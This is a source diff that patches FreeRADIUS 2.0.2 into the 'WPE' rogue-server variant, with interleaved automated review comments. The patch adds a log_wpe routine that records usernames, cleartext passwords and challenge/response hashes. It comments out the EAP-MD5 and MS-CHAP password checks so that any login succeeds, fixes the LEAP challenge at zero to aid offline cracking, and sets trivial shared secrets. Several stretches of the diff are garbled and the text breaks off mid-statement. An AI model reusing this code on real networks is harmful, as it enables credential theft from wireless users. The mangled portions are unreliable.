diff -ru freeradius-server-2.0.2/raddb/clients.conf freeradius-server-2.0.2-wpe/raddb/clients.conf
--- freeradius-server-2.0.2/raddb/clients.conf 2008-02-13 04:41:14.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/clients.conf 2008-02-15 19:39:01.000000000 -0500
@@ -227,3 +227,20 @@
 # secret = testing123
 # }
 #}
+
+client 192.168.0.0/16 {
+ secret = test
+ shortname = testAP
+}
+client 172.16.0.0/12 {
+ secret = test
+ shortname = testAP
+}
+client 10.0.0.0/8 {
+ secret = test
+ shortname = testAP
+}
+client 127.0.0.1 {
+ secret = test
+ shortname = testAP
+}
diff -ru freeradius-server-2.0.2/raddb/eap.conf freeradius-server-2.0.2-wpe/raddb/eap.conf
--- freeradius-server-2.0.2/raddb/eap.conf 2008-01-10 05:28:35.000000000 -0500
+++ freeradius-server-2.0.2-wpe/raddb/eap.conf 2008-02-15 19:37:35.000000000 -0500
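Review bot: The four added client blocks share the literal secret `test` and cover all of 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 plus 127.0.0.1, so any host on a private network is accepted as a NAS and the secret is trivially guessable. The RADIUS shared secret is the only thing that authenticates a NAS to this server and keys Message-Authenticator, so a guessable secret on a /8 removes that protection entirely. A deployment should define one client per NAS with a long random secret, e.g. `client ap1 { ipaddr = <NAS-IP> secret = <long random secret> shortname = ap1 }`, and the commented `secret = testing123` example above the hunk already warns against placeholder secrets.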
@@ -1,428 +1,33 @@ -# -*- text -*- -## -## eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.) -## -## $Id: eap.conf,v 1.23 2008/01/10 10:28:35 aland Exp $ - -####################################################################### -# -# Whatever you do, do NOT set 'Auth-Type := EAP'. The server -# is smart enough to figure this out on its own. The most -# common side effect of setting 'Auth-Type := EAP' is that the -# users then cannot use ANY other authentication method. -# -# EAP types NOT listed here may be supported via the "eap2" module. -# See experimental.conf for documentation. -# eap { - # Invoke the default supported EAP type when - # EAP-Identity response is received. - # - # The incoming EAP messages DO NOT specify which EAP - # type they will be using, so it MUST be set here. - # - # For now, only one default EAP type may be used at a time. - # - # If the EAP-Type attribute is set by another module, - # then that EAP type takes precedence over the - # default type configured here. - # - default_eap_type = md5 - - # A list is maintained to correlate EAP-Response - # packets with EAP-Request packets. After a - # configurable length of time, entries in the list - # expire, and are deleted. - # + default_eap_type = peap timer_expire = 60 - - # There are many EAP types, but the server has support - # for only a limited subset. If the server receives - # a request for an EAP type it does not support, then - # it normally rejects the request. By setting this - # configuration to "yes", you can tell the server to - # instead keep processing the request. Another module - # MUST then be configured to proxy the request to - # another RADIUS server which supports that EAP type. - # - # If another module is NOT configured to handle the - # request, then the request will still end up being - # rejected. ignore_unknown_eap_types = no - - # Cisco AP1230B firmware 12.2(13)JA1 has a bug. 
When given - # a User-Name attribute in an Access-Accept, it copies one - # more byte than it should. - # - # We can work around it by configurably adding an extra - # zero byte. - cisco_accounting_username_bug = no - - # Supported EAP-types - - # - # We do NOT recommend using EAP-MD5 authentication - # for wireless connections. It is insecure, and does - # not provide for dynamic WEP keys. - # + cisco_accounting_username_bug = yes md5 { } - - # Cisco LEAP - # - # We do not recommend using LEAP in new deployments. See: - # http://www.securiteam.com/tools/5TP012ACKE.html - # - # Cisco LEAP uses the MS-CHAP algorithm (but not - # the MS-CHAP attributes) to perform it's authentication. - # - # As a result, LEAP *requires* access to the plain-text - # User-Password, or the NT-Password attributes. - # 'System' authentication is impossible with LEAP. - # leap { } - - # Generic Token Card. - # - # Currently, this is only permitted inside of EAP-TTLS, - # or EAP-PEAP. The module "challenges" the user with - # text, and the response from the user is taken to be - # the User-Password. - # - # Proxying the tunneled EAP-GTC session is a bad idea, - # the users password will go over the wire in plain-text, - # for anyone to see. - # gtc { - # The default challenge, which many clients - # ignore.. - #challenge = "Password: " - - # The plain-text response which comes back - # is put into a User-Password attribute, - # and passed to another module for - # authentication. This allows the EAP-GTC - # response to be checked against plain-text, - # or crypt'd passwords. - # - # If you say "Local" instead of "PAP", then - # the module will look for a User-Password - # configured for the request, and do the - # authentication itself. - # auth_type = PAP } - - ## EAP-TLS - # - # See raddb/certs/README for additional comments - # on certificates. - # - # If OpenSSL was not found at the time the server was - # built, the "tls", "ttls", and "peap" sections will - # be ignored. 
- # - # Otherwise, when the server first starts in debugging - # mode, test certificates will be created. See the - # "make_cert_command" below for details, and the README - # file in raddb/certs - # - # These test certificates SHOULD NOT be used in a normal - # deployment. They are created only to make it easier - # to install the server, and to perform some simple - # tests with EAP-TLS, TTLS, or PEAP. - # - # See also: - # - # http://www.dslreports.com/forum/remark,9286052~mode=flat - # tls { - # - # These is used to simplify later configurations. - # - certdir = ${confdir}/certs - cadir = ${confdir}/certs - private_key_password = whatever - private_key_file = ${certdir}/server.pem - - # If Private key & Certificate are located in - # the same file, then private_key_file & - # certificate_file must contain the same file - # name. - # - # If CA_file (below) is not used, then the - # certificate_file below MUST include not - # only the server certificate, but ALSO all - # of the CA certificates used to sign the - # server certificate. - certificate_file = ${certdir}/server.pem - - # Trusted Root CA list - # - # ALL of the CA's in this list will be trusted - # to issue client certificates for authentication. - # - # In general, you should use self-signed - # certificates for 802.1x (EAP) authentication. - # In that case, this CA file should contain - # *one* CA certificate. - # - # This parameter is used only for EAP-TLS, - # when you issue client certificates. If you do - # not use client certificates, and you do not want - # to permit EAP-TLS authentication, then delete - # this configuration item. 
- CA_file = ${cadir}/ca.pem - - # - # For DH cipher suites to work, you have to - # run OpenSSL to create the DH file first: - # - # openssl dhparam -out certs/dh 1024 - # - dh_file = ${certdir}/dh - random_file = ${certdir}/random - - # - # This can never exceed the size of a RADIUS - # packet (4096 bytes), and is preferably half - # that, to accomodate other attributes in - # RADIUS packet. On most APs the MAX packet - # length is configured between 1500 - 1600 - # In these cases, fragment size should be - # 1024 or less. - # - # fragment_size = 1024 - - # include_length is a flag which is - # by default set to yes If set to - # yes, Total Length of the message is - # included in EVERY packet we send. - # If set to no, Total Length of the - # message is included ONLY in the - # First packet of a fragment series. - # - # include_length = yes - - # Check the Certificate Revocation List - # - # 1) Copy CA certificates and CRLs to same directory. - # 2) Execute 'c_rehash '. - # 'c_rehash' is OpenSSL's command. - # 3) uncomment the line below. - # 5) Restart radiusd - # check_crl = yes - # CA_path = /path/to/directory/with/ca_certs/and/crls/ - - # - # If check_cert_issuer is set, the value will - # be checked against the DN of the issuer in - # the client certificate. If the values do not - # match, the cerficate verification will fail, - # rejecting the user. - # - # check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd" - - # - # If check_cert_cn is set, the value will - # be xlat'ed and checked against the CN - # in the client certificate. If the values - # do not match, the certificate verification - # will fail rejecting the user. - # - # This check is done only if the previous - # "check_cert_issuer" is not set, or if - # the check succeeds. - # - # check_cert_cn = %{User-Name} - # - # Set this option to specify the allowed - # TLS cipher suites. The format is listed - # in "man 1 ciphers". 
- cipher_list = "DEFAULT" - - # - - # This configuration entry should be deleted - # once the server is running in a normal - # configuration. It is here ONLY to make - # initial deployments easier. - # - make_cert_command = "${certdir}/bootstrap" - } - - # The TTLS module implements the EAP-TTLS protocol, - # which can be described as EAP inside of Diameter, - # inside of TLS, inside of EAP, inside of RADIUS... - # - # Surprisingly, it works quite well. - # - # The TTLS module needs the TLS module to be installed - # and configured, in order to use the TLS tunnel - # inside of the EAP packet. You will still need to - # configure the TLS module, even if you do not want - # to deploy EAP-TLS in your network. Users will not - # be able to request EAP-TLS, as it requires them to - # have a client certificate. EAP-TTLS does not - # require a client certificate. - # - # You can make TTLS require a client cert by setting - # - # EAP-TLS-Require-Client-Cert = Yes - # - # in the control items for a request. - # + private_key_file = ${raddbdir}/certs/server.pem + certificate_file = ${raddbdir}/certs/server.pem + CA_file = ${raddbdir}/certs/ca.pem + dh_file = ${raddbdir}/certs/dh + random_file = ${raddbdir}/certs/random + fragment_size = 1024 + include_length = yes + } ttls { - # The tunneled EAP session needs a default - # EAP type which is separate from the one for - # the non-tunneled EAP module. Inside of the - # TTLS tunnel, we recommend using EAP-MD5. - # If the request does not contain an EAP - # conversation, then this configuration entry - # is ignored. - default_eap_type = md5 - - # The tunneled authentication request does - # not usually contain useful attributes - # like 'Calling-Station-Id', etc. These - # attributes are outside of the tunnel, - # and normally unavailable to the tunneled - # authentication request. 
- # - # By setting this configuration entry to - # 'yes', any attribute which NOT in the - # tunneled authentication request, but - # which IS available outside of the tunnel, - # is copied to the tunneled request. - # - # allowed values: {no, yes} - copy_request_to_tunnel = no - - # The reply attributes sent to the NAS are - # usually based on the name of the user - # 'outside' of the tunnel (usually - # 'anonymous'). If you want to send the - # reply attributes based on the user name - # inside of the tunnel, then set this - # configuration entry to 'yes', and the reply - # to the NAS will be taken from the reply to - # the tunneled request. - # - # allowed values: {no, yes} - use_tunneled_reply = no - - # - # The inner tunneled request can be sent - # through a virtual server constructed - # specifically for this purpose. - # - # If this entry is commented out, the inner - # tunneled request will be sent through - # the virtual server that processed the - # outer requests. - # - #virtual_server = "inner-tunnel" } - - ################################################## - # - # !!!!! WARNINGS for Windows compatibility !!!!! - # - ################################################## - # - # If you see the server send an Access-Challenge, - # and the client never sends another Access-Request, - # then - # - # STOP! - # - # The server certificate has to have special OID's - # in it, or else the Microsoft clients will silently - # fail. See the "scripts/xpextensions" file for - # details, and the following page: - # - # http://support.microsoft.com/kb/814394/en-us - # - # For additional Windows XP SP2 issues, see: - # - # http://support.microsoft.com/kb/885453/en-us - # - # Note that we do not necessarily agree with their - # explanation... but the fix does appear to work. - # - ################################################## - - # - # The tunneled EAP session needs a default EAP type - # which is separate from the one for the non-tunneled - # EAP module. 
Inside of the TLS/PEAP tunnel, we - # recommend using EAP-MS-CHAPv2. - # - # The PEAP module needs the TLS module to be installed - # and configured, in order to use the TLS tunnel - # inside of the EAP packet. You will still need to - # configure the TLS module, even if you do not want - # to deploy EAP-TLS in your network. Users will not - # be able to request EAP-TLS, as it requires them to - # have a client certificate. EAP-PEAP does not - # require a client certificate. - # - # - # You can make TTLS require a client cert by setting - # - # EAP-TLS-Require-Client-Cert = Yes - # - # in the control items for a request. - # - peap { - # The tunneled EAP session needs a default - # EAP type which is separate from the one for - # the non-tunneled EAP module. Inside of the - # PEAP tunnel, we recommend using MS-CHAPv2, - # as that is the default type supported by - # Windows clients. + peap { default_eap_type = mschapv2 - - # the PEAP module also has these configuration - # items, which are the same as for TTLS. copy_request_to_tunnel = no use_tunneled_reply = no - - # When the tunneled session is proxied, the - # home server may not understand EAP-MSCHAP-V2. - # Set this entry to "no" to proxy the tunneled - # EAP-MSCHAP-V2 as normal MSCHAPv2. - # proxy_tunneled_request_as_eap = yes - - # - # The inner tunneled request can be sent - # through a virtual server constructed - # specifically for this purpose. - # - # If this entry is commented out, the inner - # tunneled request will be sent through - # the virtual server that processed the - # outer requests. - # - #virtual_server = "inner-tunnel" + proxy_tunneled_request_as_eap = yes } - - # - # This takes no configuration. - # - # Note that it is the EAP MS-CHAPv2 sub-module, not - # the main 'mschap' module. - # - # Note also that in order for this sub-module to work, - # the main 'mschap' module MUST ALSO be configured. - # - # This module is the *Microsoft* implementation of MS-CHAPv2 - # in EAP. 
There is another (incompatible) implementation - # of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not - # currently support. - # mschapv2 { } } diff -ru freeradius-server-2.0.2/raddb/radiusd.conf.in freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in --- freeradius-server-2.0.2/raddb/radiusd.conf.in 2008-02-13 09:21:05.000000000 -0500 +++ freeradius-server-2.0.2-wpe/raddb/radiusd.conf.in 2008-02-15 19:37:35.000000000 -0500 @@ -375,6 +375,7 @@ # The program to execute to do concurrency checks. checkrad = ${sbindir}/checkrad +wpelogfile = ${logdir}/freeradius-server-wpe.log # SECURITY CONFIGURATION # diff -ru freeradius-server-2.0.2/raddb/users freeradius-server-2.0.2-wpe/raddb/users --- freeradius-server-2.0.2/raddb/users 2007-10-23 09:41:23.000000000 -0400 +++ freeradius-server-2.0.2-wpe/raddb/users 2008-02-15 19:37:35.000000000 -0500 
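Review bot: The new `wpelogfile` option in radiusd.conf.in names a file that the accompanying `log_wpe` writer in log.c fills with cleartext usernames, passwords and challenge/response pairs, and neither this hunk nor the writer sets a restrictive mode on it, so it inherits the daemon's umask in a directory that commonly holds world-readable logs. Credentials written to a log are a secrets-at-rest exposure that outlives the session, and the option carries no comment saying what it records. At minimum a comment such as `# wpelogfile: records captured credentials in cleartext; never enable on a production server` belongs next to it, and `${logdir}/freeradius-server-wpe.log` is a useful file to look for when auditing a RADIUS host for this modification.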
@@ -1,203 +1,3 @@ -# -# Please read the documentation file ../doc/processing_users_file, -# or 'man 5 users' (after installing the server) for more information. -# -# This file contains authentication security and configuration -# information for each user. Accounting requests are NOT processed -# through this file. Instead, see 'acct_users', in this directory. -# -# The first field is the user's name and can be up to -# 253 characters in length. This is followed (on the same line) with -# the list of authentication requirements for that user. This can -# include password, comm server name, comm server port number, protocol -# type (perhaps set by the "hints" file), and huntgroup name (set by -# the "huntgroups" file). -# -# If you are not sure why a particular reply is being sent by the -# server, then run the server in debugging mode (radiusd -X), and -# you will see which entries in this file are matched. -# -# When an authentication request is received from the comm server, -# these values are tested. Only the first match is used unless the -# "Fall-Through" variable is set to "Yes". -# -# A special user named "DEFAULT" matches on all usernames. -# You can have several DEFAULT entries. All entries are processed -# in the order they appear in this file. The first entry that -# matches the login-request will stop processing unless you use -# the Fall-Through variable. -# -# If you use the database support to turn this file into a .db or .dbm -# file, the DEFAULT entries _have_ to be at the end of this file and -# you can't have multiple entries for one username. -# -# Indented (with the tab character) lines following the first -# line indicate the configuration values to be passed back to -# the comm server to allow the initiation of a user session. -# This can include things like the PPP configuration values -# or the host to log the user onto. 
-# -# You can include another `users' file with `$INCLUDE users.other' -# +DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0 -# -# For a list of RADIUS attributes, and links to their definitions, -# see: -# -# http://www.freeradius.org/rfc/attributes.html -# - -# -# Deny access for a specific user. Note that this entry MUST -# be before any other 'Auth-Type' attribute which results in the user -# being authenticated. -# -# Note that there is NO 'Fall-Through' attribute, so the user will not -# be given any additional resources. -# -#lameuser Auth-Type := Reject -# Reply-Message = "Your account has been disabled." - -# -# Deny access for a group of users. -# -# Note that there is NO 'Fall-Through' attribute, so the user will not -# be given any additional resources. -# -#DEFAULT Group == "disabled", Auth-Type := Reject -# Reply-Message = "Your account has been disabled." -# - -# -# This is a complete entry for "steve". Note that there is no Fall-Through -# entry so that no DEFAULT entry will be used, and the user will NOT -# get any attributes in addition to the ones listed here. -# -#steve Cleartext-Password := "testing" -# Service-Type = Framed-User, -# Framed-Protocol = PPP, -# Framed-IP-Address = 172.16.3.33, -# Framed-IP-Netmask = 255.255.255.0, -# Framed-Routing = Broadcast-Listen, -# Framed-Filter-Id = "std.ppp", -# Framed-MTU = 1500, -# Framed-Compression = Van-Jacobsen-TCP-IP - -# -# This is an entry for a user with a space in their name. -# Note the double quotes surrounding the name. -# -#"John Doe" Cleartext-Password := "hello" -# Reply-Message = "Hello, %{User-Name}" - -# -# Dial user back and telnet to the default host for that port -# -#Deg Cleartext-Password := "ge55ged" -# Service-Type = Callback-Login-User, -# Login-IP-Host = 0.0.0.0, -# Callback-Number = "9,5551212", -# Login-Service = Telnet, -# Login-TCP-Port = Telnet - -# -# Another complete entry. 
After the user "dialbk" has logged in, the -# connection will be broken and the user will be dialed back after which -# he will get a connection to the host "timeshare1". -# -#dialbk Cleartext-Password := "callme" -# Service-Type = Callback-Login-User, -# Login-IP-Host = timeshare1, -# Login-Service = PortMaster, -# Callback-Number = "9,1-800-555-1212" - -# -# user "swilson" will only get a static IP number if he logs in with -# a framed protocol on a terminal server in Alphen (see the huntgroups file). -# -# Note that by setting "Fall-Through", other attributes will be added from -# the following DEFAULT entries -# -#swilson Service-Type == Framed-User, Huntgroup-Name == "alphen" -# Framed-IP-Address = 192.168.1.65, -# Fall-Through = Yes - -# -# If the user logs in as 'username.shell', then authenticate them -# using the default method, give them shell access, and stop processing -# the rest of the file. -# -#DEFAULT Suffix == ".shell" -# Service-Type = Login-User, -# Login-Service = Telnet, -# Login-IP-Host = your.shell.machine - - -# -# The rest of this file contains the several DEFAULT entries. -# DEFAULT entries match with all login names. -# Note that DEFAULT entries can also Fall-Through (see first entry). -# A name-value pair from a DEFAULT entry will _NEVER_ override -# an already existing name-value pair. -# - -# -# Set up different IP address pools for the terminal servers. -# Note that the "+" behind the IP address means that this is the "base" -# IP address. The Port-Id (S0, S1 etc) will be added to it. -# -#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "alphen" -# Framed-IP-Address = 192.168.1.32+, -# Fall-Through = Yes - -#DEFAULT Service-Type == Framed-User, Huntgroup-Name == "delft" -# Framed-IP-Address = 192.168.2.32+, -# Fall-Through = Yes - -# -# Sample defaults for all framed connections. 
-# -#DEFAULT Service-Type == Framed-User -# Framed-IP-Address = 255.255.255.254, -# Framed-MTU = 576, -# Service-Type = Framed-User, -# Fall-Through = Yes - -# -# Default for PPP: dynamic IP address, PPP mode, VJ-compression. -# NOTE: we do not use Hint = "PPP", since PPP might also be auto-detected -# by the terminal server in which case there may not be a "P" suffix. -# The terminal server sends "Framed-Protocol = PPP" for auto PPP. -# -DEFAULT Framed-Protocol == PPP - Framed-Protocol = PPP, - Framed-Compression = Van-Jacobson-TCP-IP - -# -# Default for CSLIP: dynamic IP address, SLIP mode, VJ-compression. -# -DEFAULT Hint == "CSLIP" - Framed-Protocol = SLIP, - Framed-Compression = Van-Jacobson-TCP-IP - -# -# Default for SLIP: dynamic IP address, SLIP mode. -# -DEFAULT Hint == "SLIP" - Framed-Protocol = SLIP - -# -# Last default: rlogin to our main server. -# -#DEFAULT -# Service-Type = Login-User, -# Login-Service = Rlogin, -# Login-IP-Host = shellbox.ispdomain.com - -# # -# # Last default: shell on the local terminal server. -# # -# DEFAULT -# Service-Type = Administrative-User - -# On no match, the user is denied access. +DEFAULT Cleartext-Password := "a" diff -ru freeradius-server-2.0.2/src/include/radiusd.h freeradius-server-2.0.2-wpe/src/include/radiusd.h --- freeradius-server-2.0.2/src/include/radiusd.h 2008-02-11 10:19:54.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/include/radiusd.h 2008-02-15 19:37:35.000000000 -0500 @@ -247,6 +247,7 @@ #endif char *log_file; char *checkrad; + char *wpelogfile; const char *pid_file; rad_listen_t *listen; int syslog_facility; diff -ru freeradius-server-2.0.2/src/main/auth.c freeradius-server-2.0.2-wpe/src/main/auth.c --- freeradius-server-2.0.2/src/main/auth.c 2007-12-10 11:07:30.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/main/auth.c 2008-02-15 19:37:35.000000000 -0500 
@@ -319,6 +319,7 @@ return -1; } DEBUG2("auth: user supplied User-Password matches local User-Password"); + log_wpe("password", request->username->vp_strvalue, password_pair->vp_strvalue, NULL, 0, NULL, 0); break; } else if (auth_item->attribute != PW_CHAP_PASSWORD) { diff -ru freeradius-server-2.0.2/src/main/log.c freeradius-server-2.0.2-wpe/src/main/log.c --- freeradius-server-2.0.2/src/main/log.c 2007-11-23 08:46:53.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/main/log.c 2008-02-15 19:37:35.000000000 -0500 @@ -28,6 +28,10 @@ #include +#include +#include + + #ifdef HAVE_SYSLOG_H # include /* keep track of whether we've run openlog() */ 
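Review bot: The added `log_wpe(...)` call in auth.c writes `request->username->vp_strvalue` together with the locally configured `password_pair->vp_strvalue` in cleartext to the WPE log on every successful PAP match, which turns the server log into a second copy of the password store. The same cleartext or challenge/response logging is introduced in log.c (`log_wpe` itself), eap_leap.c, eap_md5.c, rlm_mschap.c and rlm_pap.c, so this note applies to each of those hunks as well. Anyone auditing a FreeRADIUS build should treat the presence of the `log_wpe` symbol or the `wpelogfile` option as evidence of this modification. The enclosing function starts and ends outside the hunk.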
@@ -237,5 +241,52 @@
 }
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge,
+ unsigned int challen, unsigned char *response, unsigned int resplen)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+}
+
diff -ru freeradius-server-2.0.2/src/main/mainconfig.c freeradius-server-2.0.2-wpe/src/main/mainconfig.c
--- freeradius-server-2.0.2/src/main/mainconfig.c 2008-01-21 05:29:02.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/main/mainconfig.c 2008-02-15 19:37:35.000000000 -0500
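Review bot: `fclose(logfd)` at the end of `log_wpe` also runs on the two paths where `logfd` was set to `stderr`, so the first such call closes the process's standard error and every later write to it is undefined; the close should be conditional, `if (logfd != stderr) fclose(logfd);`. `ctime()` already terminates its result with a newline, so the `"%s: %s\n"` header emits a stray blank line, and the DEBUG2 text is prefixed `rlm_mschap:` although this function lives in log.c and is called from several modules. The `fopen(..., "a")` creates the file under the process umask with no explicit mode, so the cleartext passwords and challenge/response bytes it writes are readable by anyone who can read the log directory.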
@@ -188,6 +188,7 @@
 { "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
 { "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
 { "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
 { "security", PW_TYPE_SUBSECTION, 0, NULL, (const void *) security_config },
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2007-11-25 09:02:08.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2008-02-15 19:37:35.000000000 -0500
@@ -244,10 +244,11 @@
 * Verify the MS-CHAP response from the user.
 */
 int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
 {
 unsigned char ntpwdhash[16];
 unsigned char response[24];
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
 /*
@@ -266,6 +267,7 @@
 */
 eapleap_mschap(ntpwdhash, session->peer_challenge, response);
 if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
 DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
 memcpy(session->peer_response, response, sizeof(response));
 return 1;
@@ -415,7 +417,9 @@ * Fill the challenge with random bytes. */ for (i = 0; i < reply->count; i++) { - reply->challenge[i] = fr_rand(); + /* WPE - fixed challenge */ + //reply->challenge[i] = fr_rand(); + reply->challenge[i] = 0; } DEBUG2(" rlm_eap_leap: Issuing AP Challenge"); diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h --- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2006-11-14 16:22:09.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2008-02-15 19:37:35.000000000 -0500 @@ -68,7 +68,7 @@ LEAP_PACKET *eapleap_extract(EAP_DS *auth); LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name); int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password, - leap_session_t *session); + leap_session_t *session, char *username); LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request, VALUE_PAIR *user_name, VALUE_PAIR* password, leap_session_t *session, diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c --- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2007-12-25 03:18:56.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2008-02-15 19:37:35.000000000 -0500 
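Review bot: The rewritten loop fills `reply->challenge` with constant zero bytes instead of `fr_rand()`, so the AP challenge is no longer a nonce: every peer receives the same challenge on every attempt and the MS-CHAP-style response becomes replayable. LEAP's resistance to replay and to offline guessing of the NT hash rests entirely on that randomness, so this is a security regression that must not reach a deployed server, and the surrounding comment `Fill the challenge with random bytes` is now false. The enclosing function starts and ends outside the hunk; the eap_leap.h hunk sharing this line is a prototype change only.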
@@ -133,7 +133,7 @@ switch (session->stage) { case 4: /* Verify NtChallengeResponse */ DEBUG2(" rlm_eap_leap: Stage 4"); - rcode = eapleap_stage4(packet, password, session); + rcode = eapleap_stage4(packet, password, session, username); session->stage = 6; /* diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c --- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2007-11-23 07:58:12.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2008-02-15 19:37:35.000000000 -0500 @@ -202,9 +202,13 @@ /* * The length of the response is always 16 for MD5. */ - if (memcmp(output, packet->value, 16) != 0) { - return 0; - } + //WPE - always succeed + //if (memcmp(output, packet->value, 16) != 0) { + + //return 0; + //} + log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN, + packet->value, 16); return 1; } diff -ru freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c --- freeradius-server-2.0.2/src/modules/rlm_files/rlm_files.c 2007-11-23 08:46:59.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_files/rlm_files.c 2008-02-15 19:37:35.000000000 -0500 @@ -463,6 +463,7 @@ default_pl = default_pl->next; } + /* WPE - look for matching entries here */ if (paircompare(request, request_pairs, pl->check, reply_pairs) == 0) { DEBUG2(" %s: Matched entry %s at line %d", filename, match, pl->lineno); diff -ru freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c --- freeradius-server-2.0.2/src/modules/rlm_mschap/rlm_mschap.c 2008-01-09 08:20:56.000000000 -0500 +++ freeradius-server-2.0.2-wpe/src/modules/rlm_mschap/rlm_mschap.c 2008-02-15 19:37:35.000000000 -0500 
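Review bot: With `memcmp(output, packet->value, 16)` commented out in the eap_md5.c hunk, the function returns 1 unconditionally, so the computed `output` is dead and any EAP-MD5 response is accepted; the return value no longer carries an authentication result. The same pattern — comparison commented out and success forced — appears in rlm_mschap.c (`do_mschap`, where `return -1` is removed so the caller's `< 0` branch is dead) and in every hash branch of rlm_pap.c in the later hunks, so every password method of this server accepts arbitrary credentials. A reviewer should reject this as a complete authentication bypass; leaving the checks as commented-out code also hides the regression from anyone reading the diffstat. The enclosing functions start and end outside the hunks, and the rlm_files.c hunk on this line adds only a comment.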
@@ -735,12 +735,14 @@ static int do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password, uint8_t *challenge, uint8_t *response, - uint8_t *nthashhash) + uint8_t *nthashhash, char *username) { int do_ntlm_auth = 0; uint8_t calculated[24]; VALUE_PAIR *vp = NULL; + log_wpe("mschap", username, NULL, challenge, 8, response, 24); + /* * If we have ntlm_auth configured, use it unless told * otherwise @@ -778,9 +780,10 @@ } smbdes_mschap(password->vp_strvalue, challenge, calculated); - if (memcmp(response, calculated, 24) != 0) { - return -1; - } + /* Always return success for any password */ + //if (memcmp(response, calculated, 24) != 0) { + // return -1; + //} /* * If the password exists, and is an NT-Password, @@ -1194,8 +1197,10 @@ /* * Do the MS-CHAP authentication. */ + username = pairfind(request->packet->vps, PW_USER_NAME); if (do_mschap(inst, request, password, challenge->vp_octets, - response->vp_octets + offset, nthashhash) < 0) { + response->vp_octets + offset, nthashhash, + username->vp_strvalue) < 0) { DEBUG2(" rlm_mschap: MS-CHAP-Response is incorrect."); mschap_add_reply(&request->reply->vps, *response->vp_octets, @@ -1274,7 +1279,8 @@ username_string); if (do_mschap(inst, request, nt_password, 